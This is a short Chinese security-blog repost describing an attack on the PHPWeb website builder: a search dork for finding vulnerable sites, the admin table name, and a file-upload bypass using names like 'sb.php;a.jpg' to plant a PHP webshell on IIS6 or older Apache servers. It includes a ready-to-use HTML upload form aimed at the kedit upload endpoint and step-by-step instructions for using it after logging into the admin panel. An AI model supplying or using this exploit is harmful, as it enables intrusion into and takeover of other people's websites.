phpweb成品网站全版本通杀注入漏洞

没穿底裤 2019年12月31日23:19:00评论800 views字数 731阅读2分26秒阅读模式
摘要

关键字:inurl:webmall/detail.php?id
数据表:pwn_base_admin关于拿shell首先登录后台admin.php

关键字:inurl:webmall/detail.php?id
数据表:pwn_base_admin

关于拿shell

首先登录后台admin.php

看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
http://bbs.blackbap.org/forum.php?mod=viewthread&tid=2281

 

<form action="http://0day5.com/kedit/upload_cgi/upload.php" enctype="multipart/form-data" method="post" name="uploadForm"><input type="text" name="fileName" value="sb.php;a.jpg" /> <input type="hidden" name="attachPath" value="news/pics/" /> <input type="file" name="fileData" size="14" /> <input type="submit" name="button" value="确定" /> </form>

 

首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日23:19:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpweb成品网站全版本通杀注入漏洞http://cn-sec.com/archives/75136.html

发表评论

匿名网友 填写信息